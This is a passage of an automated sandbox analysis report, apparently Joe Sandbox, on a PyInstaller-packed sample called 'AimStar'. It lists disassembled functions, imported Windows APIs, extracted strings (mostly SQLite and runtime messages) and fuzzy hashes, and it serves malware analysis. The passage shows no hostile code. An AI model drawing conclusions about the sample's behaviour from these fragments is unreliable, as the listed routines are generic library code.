Instruction Fuzzy Hash: 11810462B0B2C5AAE7608B25D5807BE7BA0FB40BC4F044132DB8D87691DF3CE465C768

Function 00007FF8A87B3EF0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87B411E

Strings

, , xrefs: 00007FF8A87B3FAE
, xrefs: 00007FF8A87B3FCD
CREATE TABLE , xrefs: 00007FF8A87B400F

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: $, $CREATE TABLE
API String ID: 2830847230-3459038510
Opcode ID: 4e173d063852160c4bc34922d03083878766ad66bf42146868f36adf735100ba
Instruction ID: 77539d5bd7f0d325ad300e9c7d6db4b218981f99bc7936fc72b8815812779c4a
Opcode Fuzzy Hash: 4e173d063852160c4bc34922d03083878766ad66bf42146868f36adf735100ba
Instruction Fuzzy Hash: 5A612863B4A6819ADB158F28A4442B9B7A2FB44BE4F444335DE6E433D1DF3DD846C314

Function 00007FF710F4D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF710F4D6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF710F4D77A
RtlUnwindEx.KERNEL32 ref: 00007FF710F4D7D4

Strings

csm, xrefs: 00007FF710F4D761

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 379511426e0802ca37d905f95375c66f50c94902af67ff3ace30cf609d056aae
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 8C51A032B1DA028AEB14BB15E045A39B399EB44BA8F904131DE4E87788DF7CF849C710

Function 00007FF8A8778D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A8778DB7

Strings

database corruption, xrefs: 00007FF8A8778F45
%s at line %d of [%.10s], xrefs: 00007FF8A8778F51
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A8778F39

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2830847230-3727861699
Opcode ID: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
Instruction ID: 187dd00be2ec043fb641199bd8bf4e0e9575ad61c50d30194fcaa2847a3d2435
Opcode Fuzzy Hash: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
Instruction Fuzzy Hash: 5651ED3270ABC095CB10CB19E4846AEBBA5F748BC4F55813AEA8E03755DF3CD465C718

Function 00007FF8A878C677 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A878C7BD
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A878C7D6

Strings

out of memory, xrefs: 00007FF8A8792508
string or blob too big, xrefs: 00007FF8A8792193

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: out of memory$string or blob too big
API String ID: 2830847230-2410398255
Opcode ID: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
Instruction ID: a27a3c2bf13112e76daad58e4d34935e8e58faae85b08be5ec2379a7a282ff3f
Opcode Fuzzy Hash: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
Instruction Fuzzy Hash: FB610466B4A69292E714DB26D14027E6BA0FF85BD4F140032EF9D07B95DF3CE891C724

Function 00007FF710F4F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF710F4F320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF710F4F408

Strings

csm, xrefs: 00007FF710F4F45A
csm, xrefs: 00007FF710F4F342

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: d7b9e28e7a0e7b2975c61d2e3997b38a28892beba2a6ee702c2072cdadd8c5f3
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: DC51B03290CA828AEB64AF21D049A79B7A8EB54BA4F984135DE4C87795CF3CF458C711

Function 00007FF710F4EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF710F4EFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF710F4EFF3

Strings

RCC, xrefs: 00007FF710F4EFC3
MOC, xrefs: 00007FF710F4EFBB

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: a49e2157a4be6dee654568926976af875951c6a0edfb77c0dfb56b29a5198339
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: D861A13290CBC585D720AB15E441BAAB7A4FB847A8F444225EF9C43B95DF7CE198CB10

Function 00007FF8A8758417 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87584C8
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A875854E

Strings

(join-%u), xrefs: 00007FF8A8758559
(subquery-%u), xrefs: 00007FF8A8758570

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: (join-%u)$(subquery-%u)
API String ID: 2830847230-2916047017
Opcode ID: 49fff31b694db0a63015b8c7494567ef428984a6d1a14628475fa2fe61a8c8d4
Instruction ID: 3972f4dc1b7f2ee36aec4bc1e3d56c297d09a6f0fc9ad3a33158cfc8670bbeed
Opcode Fuzzy Hash: 49fff31b694db0a63015b8c7494567ef428984a6d1a14628475fa2fe61a8c8d4
Instruction Fuzzy Hash: 0151E132B5A242A6EB68CE25D044B3A23A1FB04BE0F466671CE3D473C5DF3CE8518764

Function 00007FF8A81521E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A815220A
00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A8152228

Strings

CJK UNIFIED IDEOGRAPH-, xrefs: 00007FF8A815221E
HANGUL SYLLABLE , xrefs: 00007FF8A8152200

Memory Dump Source

Source File: 00000002.00000002.2416933625.00007FF8A8151000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8150000, based on PE: true

Associated: 00000002.00000002.2416884251.00007FF8A8150000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A819A000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81A8000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81FC000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81FF000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2417270701.00007FF8A8200000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8150000_AimStar.jbxd

Similarity

API ID: 00007C6126570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 800424832-87138338
Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
Instruction ID: 7f270b33b523d83db54dc06ba8366ae6cdcc79d610be9ea9dd67008049392e12
Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
Instruction Fuzzy Hash: 6D411573B0E74296E7298F18E4442697751FB90BE0F446230EAAE47AD9DF3CE501CB54

Function 00007FF8A877FEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A8780023

Strings

-, xrefs: 00007FF8A8780007
%!.15g, xrefs: 00007FF8A878006C
, xrefs: 00007FF8A8780042

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: $%!.15g$-
API String ID: 2830847230-875264902
Opcode ID: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
Instruction ID: 7e0870bb9616358646f79a214f2fb89a6eda6894f2a1bbec716446c17d27c718
Opcode Fuzzy Hash: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
Instruction Fuzzy Hash: A4412462E1E78596EB10CB2EE0417AABBA0FB967C0F004135EE9E0779ACB3DD405C714

Function 00007FF710F47E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF710F4352C,?,00000000,00007FF710F43F23), ref: 00007FF710F47F22

Strings

%s%c, xrefs: 00007FF710F47E94
%.*s, xrefs: 00007FF710F47EDB
\, xrefs: 00007FF710F47E87

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction ID: 18c38e9a56cf858a10be994ae8134691fda7f0acf0bd8851e5c1fdb8a95aab21
Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction Fuzzy Hash: F931C73171DEC145EA21AB11A851BEAA358FB84BF4F841231EE6D837C9DE3CE649C710

Function 00007FF710F42810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF710F428EA

Strings

ERROR, xrefs: 00007FF710F4286F
[PYI-%d:%ls] , xrefs: 00007FF710F42868
Error, xrefs: 00007FF710F428DD

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: b86ce9edf358cc3c53d4e31c833100a08ef38be6bc03ab033478483f9f9ff6e3
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 81219F72B1CF4182E650EB14B4467AAB3A8FB88794F800136EE8D97756DE3CE249C750

Function 00007FF710F5C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF710F5C68F
WriteFile.KERNEL32 ref: 00007FF710F5C957
WriteFile.KERNEL32 ref: 00007FF710F5C99D
GetLastError.KERNEL32 ref: 00007FF710F5CA53

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: cb331a170d3f3e293194661f9bce03eb423522669a638f87ad7619fa3e66968b
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: C2D13872B0CE488DE710DF65D4412AC7B75FB457A8B848235DE5E97B89DE38E10AC390

Function 00007FF710F5CFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF710F5CFBB), ref: 00007FF710F5D0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF710F5CFBB), ref: 00007FF710F5D177

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 3eedf9bb8d26ca03f70764ed13259895d48c43eed860efe5441def85ab95e8fa
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 0391C422E1DE5185F760BF6594422BDABB8AB40BA8F944135DE0E537C5CE38F58AC720

Function 00007FF8A879DBA0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A879DC87
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A879DCDB
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A879DD37
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A879DDB7

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID:
API String ID: 2830847230-0
Opcode ID: 1e9c3b333e92f9398ad194f103d8dae7cf096b4ecbbfa6e7b689bece2e41bd3a
Instruction ID: 8d23ad7f6fd54b6290d39df25c2f24d95efe37a736cacea9149f1a900f750970
Opcode Fuzzy Hash: 1e9c3b333e92f9398ad194f103d8dae7cf096b4ecbbfa6e7b689bece2e41bd3a
Instruction Fuzzy Hash: 5891F232A4BB46AAEAA4DF2691402793F94FB05BE0F085235DE6D077C1EF3CE4108318

Function 00007FF710F5F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF710F5FAEC
_get_daylight.LIBCMT ref: 00007FF710F5FAFD
_get_daylight.LIBCMT ref: 00007FF710F5FB0E
_isindst.LIBCMT ref: 00007FF710F5FBD9

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 1df53c408ac87d21559ad5b7a398082c095e1d7d5acafaa765a838ba00b1073c
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 0351E672F0CA1296EB14EF24D9566BCB7A9AB44378F900135DE1E52BE4DB38B50EC710

Function 00007FF710F557EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF710F5581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF710F55881
GetLastError.KERNEL32 ref: 00007FF710F55912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF710F55724), ref: 00007FF710F5595E

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: fdb5de7aaca57e00742cf106519a0bc47bce86131521b43fea6d55521e0ca2ca
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 39519F22E08A418AFB10EFB194663BDB3B9AB44B68F544435DE0997788DF3CE549C720

Function 00007FF8A87B4180 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87B41F5
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87B4219
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87B4238
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87B4250

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
